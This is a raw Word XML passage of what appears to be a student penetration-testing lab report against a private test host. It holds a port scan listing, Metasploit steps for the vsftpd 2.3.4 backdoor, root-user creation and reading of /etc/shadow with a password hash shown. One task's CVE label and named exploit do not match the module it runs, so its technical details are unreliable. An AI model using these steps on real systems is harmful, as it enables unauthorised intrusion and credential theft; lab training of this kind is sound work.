      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OS CPE: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/o:linux</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:linux_kernel:2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A48E81" w14:textId="43330763" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="002B130F" w:rsidP="00AA7BD8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">OS details: </w:t>
      </w:r>
      <w:r w:rsidR="00CF60DA">
        <w:t>Actiontec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116A6C2F" w14:textId="3ECE6CD4" w:rsidR="008D4872" w:rsidRDefault="002B130F" w:rsidP="008D4872">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF60DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Services Version with open ports</w:t>
      </w:r>
      <w:r w:rsidR="00FB1F62" w:rsidRPr="00CF60DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (LIST ALL THE OPEN PORTS EXCLUDING HIDDEN PORTS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F245E1" w14:textId="3AC4F72E" w:rsidR="00FD4AA0" w:rsidRDefault="008D4872" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>8180/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open unknown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29120AAB" w14:textId="37FFF9D7" w:rsidR="008D4872" w:rsidRDefault="008D4872" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>8009/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open ajp13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645EA9AA" w14:textId="30073E18" w:rsidR="008D4872" w:rsidRDefault="008D4872" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>3306/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysgl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E3054A6" w14:textId="712C8B55" w:rsidR="008D4872" w:rsidRDefault="008D4872" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>2049/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34EB132C" w14:textId="288AE954" w:rsidR="008D4872" w:rsidRDefault="008D4872" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>513/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB887A6" w14:textId="6F4CE61D" w:rsidR="008D4872" w:rsidRDefault="008D4872" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>80/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BD5218" w14:textId="7B3B4BBC" w:rsidR="008D4872" w:rsidRDefault="008D4872" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>514/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C5F656" w14:textId="02885792" w:rsidR="008D4872" w:rsidRDefault="00DA2383" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>5432/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0546A72F" w14:textId="1C421FD2" w:rsidR="00DA2383" w:rsidRDefault="00DA2383" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>6667/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>irc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F1990B0" w14:textId="525A3EBA" w:rsidR="00DA2383" w:rsidRDefault="00DA2383" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>5900/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vnc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11E9CF32" w14:textId="63616C16" w:rsidR="00DA2383" w:rsidRDefault="00DA2383" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>23/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6184EEBA" w14:textId="1B89DE71" w:rsidR="00DA2383" w:rsidRDefault="00DA2383" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>21/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oprn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F0AAE2" w14:textId="2D396AD4" w:rsidR="00DA2383" w:rsidRDefault="00DA2383" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>22/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1380F681" w14:textId="3C7CBC12" w:rsidR="00DA2383" w:rsidRDefault="00DA2383" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>111/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rpcbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16649D00" w14:textId="307EE2DE" w:rsidR="00DA2383" w:rsidRDefault="00DA2383" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>1524/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ingreslock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63F167A8" w14:textId="48B74A86" w:rsidR="00DA2383" w:rsidRDefault="00DA2383" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>512/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EAFC03" w14:textId="7C64A6AC" w:rsidR="00DA2383" w:rsidRDefault="00DA2383" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>1524/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ingreslock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F3ADE69" w14:textId="43AEF4EA" w:rsidR="00DA2383" w:rsidRDefault="00DA2383" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>445/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open Microsoft-ds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FB81B6" w14:textId="748801C9" w:rsidR="00DA2383" w:rsidRDefault="00DA2383" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>2121/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ccproxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039AEE04" w14:textId="0E30CABB" w:rsidR="00DA2383" w:rsidRPr="00FD4AA0" w:rsidRDefault="00DA2383" w:rsidP="00FD4AA0">
      <w:r>
        <w:t>25/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> open smtp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79573B16" w14:textId="11137C68" w:rsidR="004873CC" w:rsidRPr="00CF60DA" w:rsidRDefault="004873CC" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2282AFBC" w14:textId="209A8250" w:rsidR="004873CC" w:rsidRDefault="004873CC" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF60DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r w:rsidR="00CF60DA" w:rsidRPr="00CF60DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF60DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Exploitation of services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4735B9C9" w14:textId="7CE7BA99" w:rsidR="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit: Backdoor vulnerability (CVE-2011-1523)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F70738" w14:textId="73C66175" w:rsidR="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>STEPS: $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35A3E6F9" w14:textId="22B1DE4B" w:rsidR="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">            $</w:t>
      </w:r>
      <w:r w:rsidR="002B5850">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002B5850">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B5850">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CDDD6D" w14:textId="36940B70" w:rsidR="002B5850" w:rsidRDefault="002B5850" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">            $ set RHOST 192.168.80.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C1C2AD" w14:textId="6F029C14" w:rsidR="002B5850" w:rsidRDefault="002B5850" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">            $ set RPORT 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4893DCB1" w14:textId="02654FD0" w:rsidR="002B5850" w:rsidRDefault="002B5850" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">            $ run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11115481" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16F2DB9B" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01C2FCB2" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB87345" w14:textId="688F2FC9" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5829330C" wp14:editId="2A506E51">
            <wp:extent cx="5731510" cy="6176010"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="428585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85055" name="Picture 428585055"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="6176010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53467E32" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19B469CB" w14:textId="6F9D4A25" w:rsidR="002B5850" w:rsidRDefault="002B5850" w:rsidP="002B5850">
      <w:r>
        <w:t xml:space="preserve">Task 7: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Priviledge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A295EBE" w14:textId="7BDC3427" w:rsidR="002B5850" w:rsidRDefault="002B5850" w:rsidP="002B5850">
      <w:r>
        <w:t xml:space="preserve">Exploit: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ussermap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> script vulnerability (CVE-2007-2447)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FF14D8" w14:textId="34D1859E" w:rsidR="002B5850" w:rsidRDefault="002B5850" w:rsidP="002B5850">
      <w:r>
        <w:t xml:space="preserve">Steps: $ use exploit/ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BB9D7B" w14:textId="7B7D85FD" w:rsidR="002B5850" w:rsidRDefault="002B5850" w:rsidP="002B5850">
      <w:r>
        <w:t>$ set RHOST 192.168.80.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68552A7B" w14:textId="4472A563" w:rsidR="002B5850" w:rsidRPr="002B5850" w:rsidRDefault="002B5850" w:rsidP="002B5850">
      <w:r>
        <w:t>$ exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6780AB48" w14:textId="4E9F0705" w:rsidR="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45DD3105" wp14:editId="7CA3C18D">
            <wp:extent cx="5448300" cy="2484120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="835060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60782" name="Picture 835060782"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5449071" cy="2484472"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9C72C7" w14:textId="0B5C16CA" w:rsidR="004873CC" w:rsidRDefault="004873CC" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C51A06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Task 5 </w:t>
      </w:r>
      <w:r w:rsidR="00DA2383">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00C51A06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Create user with root permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DD1CDC" w14:textId="3EEAFEAF" w:rsidR="00FA0C07" w:rsidRDefault="00FA0C07" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adduser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002B5850">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>srishti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F2AF7F0" w14:textId="1F7E949F" w:rsidR="002B5850" w:rsidRDefault="002B5850" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">password </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>srishti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7CC637EF" w14:textId="2D5E7980" w:rsidR="002B5850" w:rsidRDefault="002B5850" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>usermod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00DA2383">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>srishti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18A6EF3C" w14:textId="5E38A32A" w:rsidR="002B5850" w:rsidRDefault="002B5850" w:rsidP="004873CC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cat/etc/passwd | grep </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>srishti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3459EE54" w14:textId="26F52469" w:rsidR="002B5850" w:rsidRDefault="008D4872" w:rsidP="004873CC">
      <w:r w:rsidRPr="008D4872">
        <w:t>srishti:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008D4872">
        <w:t>x:1003:1003</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008D4872">
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008D4872">
        <w:t>srishti,,,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008D4872">
        <w:t>:/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D4872">
        <w:t>srishti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D4872">
        <w:t>:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6D2080" w14:textId="5CAF00D1" w:rsidR="008D4872" w:rsidRDefault="008D4872" w:rsidP="004873CC">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cat /etc/shadow | grep </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srishti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="022402B0" w14:textId="584A13FF" w:rsidR="008D4872" w:rsidRDefault="008D4872" w:rsidP="004873CC">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008D4872">
        <w:t>srishti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D4872">
        <w:t>:$1$B9.n</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008D4872">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00DA2383" w:rsidRPr="008D4872">
        <w:t>Woi</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4872">
        <w:t>$p4bxAy3aIi5TVVkmiWbH3/:20225:0:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008D4872">
        <w:t>99999:7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
